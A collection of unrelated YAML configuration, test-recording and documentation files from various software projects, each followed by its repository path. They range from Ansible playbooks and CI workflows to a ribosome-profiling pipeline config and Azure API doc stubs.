server_url: "{{ foreman_server_url }}"
validate_certs: "{{ foreman_validate_certs }}"
organization: "Test Organization"
resource: content_views
search: "name ~ cleanup"
register: remaining_cvs
- name: check remaining content view versions
assert:
that:
- remaining_cvs.resources[0].versions|length == 3
- remaining_cvs.resources[1].versions|length == 3
- hosts: localhost
collections:
- theforeman.foreman
gather_facts: false
vars_files:
- vars/server.yml
tasks:
- name: remove test organization
include_tasks: tasks/organization.yml
vars:
organization_name: "Test Organization"
organization_state: "absent"
|
collections/ansible_collections/theforeman/foreman/tests/test_playbooks/content_view_version_cleanup_role.yml
|
provenance:
authors:
- author: <NAME>
email: <EMAIL>
website:
date run: 2021-06-01
riboviz-version: 2.1beta | COMMIT f3e77ac58438d3bcc80b78fe78a58b75f0029633
GEO: GSE154488
reference: Global translational landscape of the Candida albicans morphological transition. G3 Genes|Genomes|Genetics 2021 Feb;11(2):jkaa043. Mundodi et. al.
DOI: https://doi.org/10.1093/g3journal/jkaa043
notes: Candida albicans RPF dataset at 37C (3 replicates)
adapters: AGATCGGAAGAGCACACGTCTGAACTCCAGTCA # Illumina sequencing adapter(s) to remove
aligner: hisat2 # Short read aligner to use. Currently only hisat2 works
buffer: 120
asite_disp_length_file: data/yeast_standard_asite_disp_length.txt # Table of fixed A-site positions by read length
build_indices: TRUE # Build indices for aligner? if TRUE, remake indices from fasta files
cmd_file: Mundodi_Calbicans_riboviz.sh # Bash commands file
codon_positions_file: null
count_reads: TRUE # Scan input, temporary and output files and produce counts of reads in each FASTQ, SAM, and BAM file processed?
count_threshold: 64 # Remove genes with a read count below this threshold, when generating statistics and figures
dataset: Mundodi_Calbicans_37C # Dataset name
dir_index: M-Ca_2021/index # Built indices directory
dir_in: M-Ca_2021/input # Input directory
dir_logs: M-Ca_2021/log # Log files directory
dir_out: M-Ca_2021/output # Output directory
dir_tmp: M-Ca_2021/tmp # Intermediate files directory
do_pos_sp_nt_freq: TRUE # Calculate position-specific nucleotide frequency?
extract_umis: FALSE # Extract UMIs if TRUE
group_umis: FALSE # Summarise UMI groups before and after deduplication, if TRUE
is_riboviz_gff: TRUE # Does the GFF file contain 3 elements per gene - UTR5, CDS, and UTR3
is_test_run: FALSE # Is this a test run
make_bedgraph: TRUE # Output bedgraph files, as TSV, in addition to h5?
max_read_length: 50 # Maximum read length in H5 output
min_read_length: 10 # Minimum read length in H5 output
features_file: null
fq_files:
37C1: SRR12228384.fastq.gz
37C2: SRR12228385.fastq.gz
37C3: SRR12228386.fastq.gz
num_processes: 16 # Number of processes to parallelize over
orf_fasta_file: ../example-datasets/fungi/candida/annotation/Candida_albicans_CDS_with_120utrs.fa # ORF file to align to
orf_gff_file: ../example-datasets/fungi/candida/annotation/Candida_albicans_CDS_with_120utrs.gff3 # GFF2/GFF3 file for ORFs
orf_index_prefix: calbicans_CDS # ORF index file prefix, relative to dir_index
primary_id: Name # Primary gene IDs to access the data (YAL001C, YAL003W, etc.)
rpf: TRUE # Is the dataset an RPF or mRNA dataset?
rrna_fasta_file: ../example-datasets/fungi/candida/contaminants/Candida_albicans_rRNA_tRNA.fa # rRNA file to avoid aligning to
rrna_index_prefix: calbicans_rRNA # rRNA index file prefix, relative to dir_index
secondary_id: NULL # Secondary gene IDs to access the data (COX1, EFB1, etc.)
stop_in_cds: FALSE # Are stop codons part of the CDS annotations in GFF?
t_rna_file: null
|
fungi/candida/Mundodi_2021_RPF_37C_CDS_with_120utrs_config.yaml
|
interactions:
- request:
body: null
headers:
Connection:
- close
Host:
- vimeo.com
User-Agent:
- python-micawber
method: GET
uri: https://vimeo.com/api/oembed.json?format=json&maxheight=1080&maxwidth=1920&url=https%3A%2F%2Fvimeo.com%2F148751763
response:
body:
string: '{"type":"video","version":"1.0","provider_name":"Vimeo","provider_url":"https:\/\/vimeo.com\/","title":"Rick
Astley - Never Gonna Give You Up","author_name":"<NAME>","author_url":"https:\/\/vimeo.com\/user46726126","is_plus":"0","account_type":"basic","html":"<iframe
src=\"https:\/\/player.vimeo.com\/video\/148751763?app_id=122963\" width=\"320\"
height=\"240\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture\"
allowfullscreen title=\"<NAME> - Never Gonna Give You Up\"><\/iframe>","width":320,"height":240,"duration":214,"description":"","thumbnail_url":"https:\/\/i.vimeocdn.com\/video\/547780029_295x166.jpg","thumbnail_width":295,"thumbnail_height":221,"thumbnail_url_with_play_button":"https:\/\/i.vimeocdn.com\/filter\/overlay?src0=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F547780029_295x166.jpg&src1=http%3A%2F%2Ff.vimeocdn.com%2Fp%2Fimages%2Fcrawler_play.png","upload_date":"2015-12-12
19:51:18","video_id":148751763,"uri":"\/videos\/148751763"}'
headers:
Accept-Ranges:
- bytes
Access-Control-Allow-Headers:
- X-Requested-With
Access-Control-Allow-Origin:
- '*'
Age:
- '0'
Cache-Control:
- no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection:
- close
Content-Length:
- '982'
Content-Security-Policy-Report-Only:
- 'default-src https: data: blob: wss: ''unsafe-inline'' ''unsafe-eval''; report-uri
/_csp'
Content-Type:
- application/json
Date:
- Thu, 18 Mar 2021 09:22:45 GMT
Etag:
- '"3d00955b438ddd10b764354ab9578e738318c3b7"'
Last-Modified:
- Thu, 18 Mar 2021 08:21:04 GMT
Server:
- nginx
Strict-Transport-Security:
- max-age=31536000; includeSubDomains; preload
Vary:
- Accept-Encoding
Via:
- 1.1 varnish, 1.1 varnish, 1.1 varnish
X-BApp-Server:
- pweb-v9157-nfxnf
X-Cache:
- MISS, MISS
X-Cache-Hits:
- 0, 0
X-Content-Type-Options:
- nosniff
X-Frame-Options:
- sameorigin
X-Served-By:
- cache-bwi5140-BWI, cache-cph20621-CPH
X-Timer:
- S1616059366.666689,VS0,VE133
X-UA-Compatible:
- IE=edge
X-VServer:
- infra-webproxy-a-9
X-Varnish-Cache:
- '0'
X-Vimeo-DC:
- ge
X-XSS-Protection:
- 1; mode=block
status:
code: 200
message: OK
version: 1
|
saleor/graphql/core/tests/cassettes/test_get_oembed_data[https:/vimeo.com/148751763-VIDEO].yaml
|
title: <NAME>, BSc, MSc.
name: <NAME>
email: <EMAIL>
description: I am a Computer Science PhD student at the University of Exeter.
baseurl: "/blog"
url: ""
parallax_image_one: assets/images/startup3.jpg # These are the images used for the parallax background
parallax_image_two: assets/images/startup3.jpg
project_one: My PhD Project
project_one_description: My PhD involves the estimation of an object’s shape, reflectance and surface topography from photographs using machine learning and artificial intelligence approaches.
project_one_url: http://emps.exeter.ac.uk/computer-science/staff/mm757
project_one_icon: location_on
project_two: RTI Group at Exeter
project_two_description: The group in which I am a postgraduate student consists of a range of personnel from various disciplines including computer science, natrual science and material science.
project_two_url: https://www.rtigroup.org/
project_two_icon: restaurant
project_three: Solar Eclipse TV Interview
project_three_description: I was contacted for an interview and asked to explain how to image the 2015 solar eclipse. I also discussed some astrophotograpy which I had posted online.
project_three_url: https://www.youtube.com/watch?v=VR57efH0Kfs&t=8s
project_three_icon: photo_camera
project_four: Photography
project_four_description: A few of my photographs
project_four_url: https://photos.app.goo.gl/JDyzvJJ9JCwH9u27A
project_four_icon: hotel
portfolio_heading: Research and Interests
portfolio_type: cards
syntax_highlighting: true
# Skill icons from https://konpa.github.io/devicon/
#skills:
#Matlab, R, Python, C#, C++, Javascript, LabVIEW, Unity, Blender, Github.
icon_size: 50 # font-size of icons in px
colored: colored # Leave blank for black and white icons
project_button: SEE MORE
github: _
medium: _
baseurl: # if your site is located at /blog or /home, enter it here, otherwise leave it empty
url: http://localhost:4000/ #the url of your site
google_analytics_tracking_id: UA-121110956-1
cookies_banner: none # The value "show" will show the cookies banner, the value "none" will hide the banner.
cookie_accept_message: Thanks!
syntax_highlighting: true # include the css for syntax highlighting
# Build settings
markdown: kramdown
# theme: minima
permalink: pretty
plugins:
- jekyll-feed
- jekyll-assets
- jekyll-minifier
|
_config.yml
|
title: GitHub Script Runner
summary: Downloads and Runs a bash script stored on a private GitHub repo.
description: |
Downloads and Runs a bash script stored on a private GitHub repo.
### Configuring the Step
Before using the step, you need to push your bash script into a private GitHub repository and set up a GitHub personal access token with read permission on the same repository.
1. The "file raw path" param expects the full path of the script file
"https://raw.githubusercontent.com/{owner}/{repo}/{branch}/{file}"
2. The "run script" param indicates that the script should be run after the download
"yes" to run the bash script and "no" to just download the raw file
3. The "github access token" param must be a Bitrise Secret config
### Troubleshooting
If the Step fails, check if the given GitHub Personal Access Token has read permission on the script's repository.
### Useful links
https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token
website: https://github.com/AndersonLasak/bitrise-step-github-script-runner
source_code_url: https://github.com/AndersonLasak/bitrise-step-github-script-runner
support_url: https://github.com/AndersonLasak/bitrise-step-github-script-runner/issues
published_at: 2021-06-25T18:56:15.109701-03:00
source:
git: https://github.com/AndersonLasak/bitrise-step-github-script-runner.git
commit: a0f3739d2390b52a1e7aefdcad4f1a1db8489ce8
host_os_tags:
- osx-10.10
- ubuntu-16.04
type_tags:
- utility
toolkit:
bash:
entry_file: step.sh
deps:
brew:
- name: curl
is_requires_admin_user: false
is_always_run: false
is_skippable: false
run_if: ""
inputs:
- opts:
description: |
The path should contain the owner, repository, branch and filename with its extension, like follow:\n\n
"https://raw.githubusercontent.com/{owner}/{repo}/{branch}/{file}"
is_expand: true
is_required: true
title: The file raw path
value_options: []
raw_file_path: null
- opts:
description: |
Indicates if the downloaded file is a bash script that should be run, use "yes" to run the bash script and "no" to just download the raw file.
is_expand: true
is_required: true
title: Field that says if the script should be run
value_options:
- "no"
- "yes"
run_script: "yes"
- github_access_token: null
opts:
description: |
A personal access token is required to download the raw file via GitHub v3 API.\n\n
For more information visit the official page:\n
https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token
is_expand: true
is_required: true
is_sensitive: true
title: The personal access token from your GitHub account
value_options: []
|
steps/github-script-runner/0.0.1/step.yml
|
name: Continuous Integration
# This action works with pull requests
on:
pull_request:
jobs:
CI:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
with:
# Make sure the actual branch is checked out when running on pull requests
ref: ${{ github.head_ref }}
- name: Setup Node.js
uses: actions/setup-node@v2
with:
node-version: "16.x"
cache: npm
- name: Install Node modules
run: npm ci
- name: Lint
run: npm run lint
- name: Compile
run: npm run compile
- name: Unit Tests
env:
MAINNET_URL: ${{ secrets.MAINNET_URL }}
MNEMONIC_PHRASE: ${{ secrets.MNEMONIC_PHRASE }}
USER_DEPLOYER_PRIVATE_KEY: ${{ secrets.USER_DEPLOYER_PRIVATE_KEY }}
USER_TREASURY_PRIVATE_KEY: ${{ secrets.USER_TREASURY_PRIVATE_KEY }}
USER_BOT_PRIVATE_KEY: ${{ secrets.USER_BOT_PRIVATE_KEY }}
GOERLI_URL: ${{ secrets.GOERLI_URL }}
KOVAN_URL: ${{ secrets.KOVAN_URL }}
run: |
npm run node &
echo 'Sleeping for 7 seconds...'
sleep 7
npm run test-unit
- name: Integration Tests
env:
MAINNET_URL: ${{ secrets.MAINNET_URL }}
MNEMONIC_PHRASE: ${{ secrets.MNEMONIC_PHRASE }}
USER_DEPLOYER_PRIVATE_KEY: ${{ secrets.USER_DEPLOYER_PRIVATE_KEY }}
USER_TREASURY_PRIVATE_KEY: ${{ secrets.USER_TREASURY_PRIVATE_KEY }}
USER_BOT_PRIVATE_KEY: ${{ secrets.USER_BOT_PRIVATE_KEY }}
GOERLI_URL: ${{ secrets.GOERLI_URL }}
KOVAN_URL: ${{ secrets.KOVAN_URL }}
run: |
npm run node &
echo 'Sleeping for 7 seconds...'
sleep 7
npm test
- name: Prettify code
run: npm run format
- name: Commit changes
uses: stefanzweifel/git-auto-commit-action@v4
with:
commit_message: Prettified code!
branch: ${{ github.head_ref }}
commit_options: "--no-verify"
|
.github/workflows/build-workflow.yml
|
interactions:
- request:
body: null
headers:
Connection: [keep-alive]
Content-Length: ['0']
User-Agent: [Azure-Storage/0.34.0 (Python CPython 3.5.2; Windows 10)]
x-ms-client-request-id: [893e0290-f4a9-11e6-b05e-64510640cc62]
x-ms-date: ['Fri, 17 Feb 2017 00:39:27 GMT']
x-ms-version: ['2016-05-31']
method: PUT
uri: https://storagename.blob.core.windows.net/containerc01c0c5d?restype=container
response:
body: {string: ''}
headers:
Date: ['Fri, 17 Feb 2017 00:39:26 GMT']
ETag: ['"0x8D456CD6D83F7A1"']
Last-Modified: ['Fri, 17 Feb 2017 00:39:27 GMT']
Server: [Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0]
Transfer-Encoding: [chunked]
x-ms-request-id: [a6966097-0001-0041-1ab6-88cadf000000]
x-ms-version: ['2016-05-31']
status: {code: 201, message: Created}
- request:
body: hello world
headers:
Connection: [keep-alive]
Content-Length: ['11']
User-Agent: [Azure-Storage/0.34.0 (Python CPython 3.5.2; Windows 10)]
x-ms-blob-type: [BlockBlob]
x-ms-client-request-id: [89788764-f4a9-11e6-ac43-64510640cc62]
x-ms-date: ['Fri, 17 Feb 2017 00:39:27 GMT']
x-ms-version: ['2016-05-31']
method: PUT
uri: https://storagename.blob.core.windows.net/containerc01c0c5d/blob1
response:
body: {string: ''}
headers:
Content-MD5: [XrY7u+Ae7tCTyyK7j1rNww==]
Date: ['Fri, 17 Feb 2017 00:39:27 GMT']
ETag: ['"0x8D456CD6D952A86"']
Last-Modified: ['Fri, 17 Feb 2017 00:39:27 GMT']
Server: [Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0]
Transfer-Encoding: [chunked]
x-ms-request-id: [a69660a1-0001-0041-22b6-88cadf000000]
x-ms-request-server-encrypted: ['true']
x-ms-version: ['2016-05-31']
status: {code: 201, message: Created}
- request:
body: hello world
headers:
Connection: [keep-alive]
Content-Length: ['11']
User-Agent: [Azure-Storage/0.34.0 (Python CPython 3.5.2; Windows 10)]
x-ms-blob-type: [BlockBlob]
x-ms-client-request-id: [8987d5f6-f4a9-11e6-8ab7-64510640cc62]
x-ms-date: ['Fri, 17 Feb 2017 00:39:27 GMT']
x-ms-version: ['2016-05-31']
method: PUT
uri: https://storagename.blob.core.windows.net/containerc01c0c5d/blob2
response:
body: {string: ''}
headers:
Content-MD5: [XrY7u+Ae7tCTyyK7j1rNww==]
Date: ['Fri, 17 Feb 2017 00:39:27 GMT']
ETag: ['"0x8D456CD6DA49420"']
Last-Modified: ['Fri, 17 Feb 2017 00:39:27 GMT']
Server: [Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0]
Transfer-Encoding: [chunked]
x-ms-request-id: [a69660a5-0001-0041-26b6-88cadf000000]
x-ms-request-server-encrypted: ['true']
x-ms-version: ['2016-05-31']
status: {code: 201, message: Created}
- request:
body: null
headers:
Connection: [keep-alive]
User-Agent: [Azure-Storage/0.34.0 (Python CPython 3.5.2; Windows 10)]
x-ms-client-request-id: [89978ec2-f4a9-11e6-b808-64510640cc62]
x-ms-date: ['Fri, 17 Feb 2017 00:39:27 GMT']
x-ms-version: ['2016-05-31']
method: GET
uri: https://storagename.blob.core.windows.net/containerc01c0c5d?comp=list&restype=container
response:
body: {string: "\uFEFF<?xml version=\"1.0\" encoding=\"utf-8\"?><EnumerationResults
ServiceEndpoint=\"https://storagename.blob.core.windows.net/\" ContainerName=\"containerc01c0c5d\"><Blobs><Blob><Name>blob1</Name><Properties><Last-Modified>Fri,
17 Feb 2017 00:39:27 GMT</Last-Modified><Etag>0x8D456CD6D952A86</Etag><Content-Length>11</Content-Length><Content-Type>application/octet-stream</Content-Type><Content-Encoding
/><Content-Language /><Content-MD5>XrY7u+Ae7tCTyyK7j1rNww==</Content-MD5><Cache-Control
/><Content-Disposition /><BlobType>BlockBlob</BlobType><LeaseStatus>unlocked</LeaseStatus><LeaseState>available</LeaseState><ServerEncrypted>true</ServerEncrypted></Properties></Blob><Blob><Name>blob2</Name><Properties><Last-Modified>Fri,
17 Feb 2017 00:39:27 GMT</Last-Modified><Etag>0x8D456CD6DA49420</Etag><Content-Length>11</Content-Length><Content-Type>application/octet-stream</Content-Type><Content-Encoding
/><Content-Language /><Content-MD5>XrY7u+Ae7tCTyyK7j1rNww==</Content-MD5><Cache-Control
/><Content-Disposition /><BlobType>BlockBlob</BlobType><LeaseStatus>unlocked</LeaseStatus><LeaseState>available</LeaseState><ServerEncrypted>true</ServerEncrypted></Properties></Blob></Blobs><NextMarker
/></EnumerationResults>"}
headers:
Content-Type: [application/xml]
Date: ['Fri, 17 Feb 2017 00:39:27 GMT']
Server: [Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0]
Transfer-Encoding: [chunked]
Vary: [Origin]
x-ms-request-id: [a69660ab-0001-0041-2cb6-88cadf000000]
x-ms-version: ['2016-05-31']
status: {code: 200, message: OK}
version: 1
|
tests/recordings/test_container.test_list_blobs.yaml
|
server:
port: 8080
max-http-header-size: 100000
servlet:
session:
timeout: 600
spring:
application:
name: agile-base-server
session:
# 设置spring-session存储类型
store-type: redis
redis:
# Redis数据库索引(默认为0)
database: 1
hostName: localhost
port: 6379
password:
timeout: 0
general-config:
min-idle: 1
max-idle: 2
max-total: 5
max-wait: 30000
test-on-borrow: true
block-when-exhausted: true
test-on-return: true
test-on-create: true
test-while-idle: true
time-between-eviction-runs-millis: 60000
min-evictable-idle-time-millis: 20000
num-tests-per-eviction-run: 20000
jedis:
pool:
# 连接池最大阻塞等待时间(使用负值表示没有限制)
max-wait:
# 连接池中的最大空闲连接
max-idle: 8
# 连接池中的最小空闲连接
min-idle: 0
datasource:
druid:
url: jdbc:mysql://localhost:3306/mytest?allowMultiQueries=true&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&useSSL=false&allowPublicKeyRetrieval=true
username: root
password: <PASSWORD>
# 初始化时建立物理连接的个数。初始化发生在显示调用init方法,或者第一次getConnection时
initial-size: 10
# 最小连接池数量
min-idle: 10
# 最大连接池数量
max-active: 20
# 获取连接等待超时的时间
max-wait: 20000
# 间隔多久才进行一次检测,检测需要关闭的空闲连接,单位是毫秒
time-between-eviction-runs-millis: 60000
# 一个连接在池中最小生存的时间,单位是毫秒
min-evictable-idle-time-millis: 300000
# 验证连接有效与否的SQL,不同的数据配置不同
validation-query: select 1
# 建议配置为true,不影响性能,并且保证安全性。申请连接的时候检测,如果空闲时间大于timeBetweenEvictionRunsMillis,执行validationQuery检测连接是否有效。
test-while-idle: true
# 申请连接时执行validationQuery检测连接是否有效,做了这个配置会降低性能。这里建议配置为TRUE,防止取到的连接不可用
test-on-borrow: true
# 归还连接时执行validationQuery检测连接是否有效,做了这个配置会降低性能
test-on-return: false
# 是否缓存preparedStatement,也就是PSCache。PSCache对支持游标的数据库性能提升巨大,比如说oracle。在mysql5.5以下的版本中没有PSCache功能,建议关闭掉。作者在5.5版本中使用PSCache,通过监控界面发现PSCache有缓存命中率记录,该应该是支持PSCache。打开PSCache,并且指定每个连接上PSCache的大小
pool-prepared-statements: true
max-pool-prepared-statement-per-connection-size: 20
# 属性类型是字符串,通过别名的方式配置扩展插件,常用的插件有:监控统计用的filter:stat 日志用的filter:log4j 防御sql注入的filter:wall
filters: stat,wall,log4j
stat-view-servlet:
login-username: druid
login-password: <PASSWORD>
http:
encoding:
charset: utf-8
enabled: true
force: true
resources:
# 资源缓存时间,单位秒,4 h
chain:
# 开启gzip压缩
# 启用缓存
cache: true
compressed: true
static-locations:
- classpath:/resources/
- file:/Users/reige/work/mapo-manage/
- classpath:/META-INF/resources/
- classpath:/META-INF/resources/webjars/
activemq:
broker-url: tcp://localhost:61616
user: admin
password: <PASSWORD>
packages:
trust-all: true
#mybatis
mybatis-plus:
mapper-locations: classpath*:/mapper/**/*Mapper.xml
#实体扫描,多个package用逗号或者分号分隔
typeAliasesPackage: com.example.demo.mapper
global-config:
# 数据库相关配置
db-config:
#主键类型 AUTO:"数据库ID自增", INPUT:"用户输入ID",ID_WORKER:"全局唯一ID (数字类型唯一ID)", UUID:"全局唯一ID UUID";
id-type: UUID
#字段策略 IGNORED:"忽略判断",NOT_NULL:"非 NULL 判断"),NOT_EMPTY:"非空判断"
field-strategy: not_null
#驼峰下划线转换
column-underline: true
#数据库大写下划线转换
#capital-mode: true
#逻辑删除配置
logic-delete-value: 0
logic-not-delete-value: 1
db-type: mysql
#刷新mapper 调试神器
refresh: true
# 原生配置
configuration:
map-underscore-to-camel-case: true
cache-enabled: false
#file-upload:
# ## 文件上传文件夹 自动 追加 /uploads/
# file-save-path: E://IDE//IDE//workspace//mapo-manage
# template-path: E://IDE//IDE//workspace//mapo-manage//template
# compress-height: 200
# compress-width: 200
# ffmpeg-home: /Users/reige/work/mapo-manage/doc/ffmpeg/bin
|
src/main/resources/application.yml
|
---
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-trigger-ad_hoc/52/
timestamp: 2016-02-17 21:18:59 UTC
duration: 1h24m7s
triggered_by: jamesc
active_duration: 1h23m48s
parameters:
GIT_REF: jc/743/nginx-hash_bucket_size-2
EXPIRE_CACHE: false
change:
git_remote: <EMAIL>:chef/chef-server.git
git_commit: <PASSWORD>
project: chef-server
version: 12.4.2+20160217211913
stages:
chef-server-12-promote:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-promote/58/
duration: 0s
chef-server-12-test:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-test/96/
duration: 50m31s
runs:
el-5:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=el-5,project=chef-server,role=tester/96/
duration: 49m14s
el-6:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=el-6,project=chef-server,role=tester/96/
duration: 50m31s
el-7:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=el-7,project=chef-server,role=tester/96/
duration: 41m5s
ubuntu-10.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=ubuntu-10.04,project=chef-server,role=tester/96/
duration: 44m8s
ubuntu-12.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=ubuntu-12.04,project=chef-server,role=tester/96/
duration: 44m26s
ubuntu-14.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=ubuntu-14.04,project=chef-server,role=tester/96/
duration: 43m16s
chef-server-12-build:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-build/104/
duration: 33m8s
runs:
el-5:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-build/architecture=x86_64,platform=el-5,project=chef-server,role=builder/104/
duration: 32m58s
el-6:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-build/architecture=x86_64,platform=el-6,project=chef-server,role=builder/104/
duration: 22m6s
el-7:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-build/architecture=x86_64,platform=el-7,project=chef-server,role=builder/104/
duration: 22m36s
ubuntu-10.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-build/architecture=x86_64,platform=ubuntu-10.04,project=chef-server,role=builder/104/
duration: 15m56s
chef-server-12-trigger-ad_hoc:
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-trigger-ad_hoc/52/
duration: 7s
|
reports/wilson.ci.chef.co/job/chef-server-12-trigger-ad_hoc/52.yaml
|
---
- hosts: [kickstart]
become: yes
handlers:
- name: restart dnsmasq
service: name=dnsmasq state=restarted
- name: restart ntp
service: name=ntpd state=restarted
- name: restart httpd
service: name=httpd state=restarted
tasks:
- name: install the required packages
# More generic but since we know it is centos
# package: name={{ item }} state=latest
yum: name={{ item }} state=present
with_items:
- wget
- httpd
- tftp
- tftp-server
- vsftpd
- syslinux
- ntp
- net-tools
- bind-utils
- tcpdump
- pyOpenSSL
- git
- name: disable SELinux
selinux: policy=targeted state=permissive
- name: prepare configuration directories
file:
path: "{{ item }}"
state: directory
with_items:
- /etc/dnsmasq
- /etc/httpd
- "{{ tftp_boot_loc }}"
- "{{ tftp_boot_loc }}/centos_cloud_atomic_23/"
- "{{ archives_loc }}"
- /opt/ISOs
- name: configure dnsmasq
template:
src: "{{ templates_dir }}/dnsmasq.conf.j2"
dest: "/etc/dnsmasq/dnsmasq.conf"
owner: root
group: root
mode: 0644
notify: restart dnsmasq
- name: configure ntp
template:
src: "{{ templates_dir }}/ntp.conf.j2"
dest: "/etc/ntp.conf"
owner: root
group: root
mode: 0644
notify: restart ntp
- name: configure httpd
copy:
src: "{{ src_cfg_dir }}/etc/httpd/conf.d/local-kickstart.conf"
dest: "/etc/httpd/conf.d/local-kickstart.conf"
owner: root
group: root
mode: 0644
notify: restart httpd
- name: configure httpd port 8080
lineinfile:
dest: "/etc/httpd/conf/httpd.conf"
regexp: "Listen 8080"
line: "Listen 8080"
notify: restart httpd
- name: enable and start services
service: name={{ item }} enabled=yes state=started
with_items:
- dnsmasq
- httpd
- tftp
- vsftpd
- ntpd
- name: bootloader files
shell: ls /usr/share/syslinux
register: bootloader_files
#- name: What's in bootloader_files?
# debug: var=bootloader_files
- name: add bootloader files
shell: cp -r /usr/share/syslinux/* {{ tftp_boot_loc }}/.
- name: is ISO in /vagrant/archives?
stat: path={{ atomic_c_iso_loc }}
register: atomic_iso_stat
- name: What's in atomic_iso_stat?
debug: var=atomic_iso_stat
#- name: fail on missing ISO
# fail: msg="Add the atomic ISO to archives: wget {{ atomic_c_iso_url }}."
# when: atomic_iso_stat.exists
- name: copy ISO to archives
copy: src={{ atomic_c_iso_loc }} dest=/opt/ISOs
when: atomic_iso_stat.stat.exists
- name: download ISO
get_url: >
url={{ atomic_c_iso_url }}
dest=/opt/ISOs
timeout=600
when: not atomic_iso_stat.stat.exists
- name: mount ISOs
mount:
name: /var/ftp/pub/centos_cloud_atomic_23
src: "/opt/ISOs/{{ atomic_c_iso }}"
fstype: iso9660
opts: loop,ro
state: mounted
- name: prepate tftp boot
shell: cp -r /var/ftp/pub/centos_cloud_atomic_23/images/pxeboot/* {{ tftp_boot_loc }}/centos_cloud_atomic_23/.
|
playbooks/setup-kickstart.yml
|
name: O365ConnectorCard
uid: botframework-schema.O365ConnectorCard
package: botframework-schema
summary: ''
fullName: O365ConnectorCard
remarks: ''
isPreview: false
isDeprecated: false
type: interface
properties:
- name: potentialAction
uid: botframework-schema.O365ConnectorCard.potentialAction
package: botframework-schema
summary: ''
fullName: potentialAction
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'potentialAction?: O365ConnectorCardActionBase[]'
return:
type: '<xref uid="botframework-schema.O365ConnectorCardActionBase" />[]'
description: ''
- name: sections
uid: botframework-schema.O365ConnectorCard.sections
package: botframework-schema
summary: ''
fullName: sections
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'sections?: O365ConnectorCardSection[]'
return:
type: '<xref uid="botframework-schema.O365ConnectorCardSection" />[]'
description: ''
- name: summary
uid: botframework-schema.O365ConnectorCard.summary
package: botframework-schema
summary: ''
fullName: summary
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'summary?: string'
return:
type: string
description: ''
- name: text
uid: botframework-schema.O365ConnectorCard.text
package: botframework-schema
summary: ''
fullName: text
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'text?: string'
return:
type: string
description: ''
- name: themeColor
uid: botframework-schema.O365ConnectorCard.themeColor
package: botframework-schema
summary: ''
fullName: themeColor
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'themeColor?: string'
return:
type: string
description: ''
- name: title
uid: botframework-schema.O365ConnectorCard.title
package: botframework-schema
summary: ''
fullName: title
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'title?: string'
return:
type: string
description: ''
|
botbuilder-typescript/docs-ref-autogen/botframework-schema/O365ConnectorCard.yml
|
items:
- uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile'
name: ContainerServiceNetworkProfile
fullName: ContainerServiceNetworkProfile
children:
- '@azure/arm-containerservice.ContainerServiceNetworkProfile.dnsServiceIP'
- '@azure/arm-containerservice.ContainerServiceNetworkProfile.dockerBridgeCidr'
- '@azure/arm-containerservice.ContainerServiceNetworkProfile.networkPlugin'
- '@azure/arm-containerservice.ContainerServiceNetworkProfile.networkPolicy'
- '@azure/arm-containerservice.ContainerServiceNetworkProfile.podCidr'
- '@azure/arm-containerservice.ContainerServiceNetworkProfile.serviceCidr'
langs:
- typeScript
type: interface
summary: Profil de configuration réseau.
package: '@azure/arm-containerservice'
- uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.dnsServiceIP'
name: dnsServiceIP
fullName: dnsServiceIP
children: []
langs:
- typeScript
type: property
summary: 'Adresse IP affectée au service DNS Kubernetes. Il doit être dans la plage d’adresses de service Kubernetes spécifiée dans serviceCidr. Valeur par défaut : ''10.0.0.10''.'
optional: true
syntax:
content: 'dnsServiceIP?: undefined | string'
return:
type:
- undefined | string
package: '@azure/arm-containerservice'
- uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.dockerBridgeCidr'
name: dockerBridgeCidr
fullName: dockerBridgeCidr
children: []
langs:
- typeScript
type: property
summary: 'Une plage IP notation CIDR attribuée au réseau de pont Docker. Il ne doit pas chevaucher les plages de sous-réseau IP ou la plage d’adresses de service Kubernetes. Valeur par défaut : ''172.17.0.1/16''.'
optional: true
syntax:
content: 'dockerBridgeCidr?: undefined | string'
return:
type:
- undefined | string
package: '@azure/arm-containerservice'
- uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.networkPlugin'
name: networkPlugin
fullName: networkPlugin
children: []
langs:
- typeScript
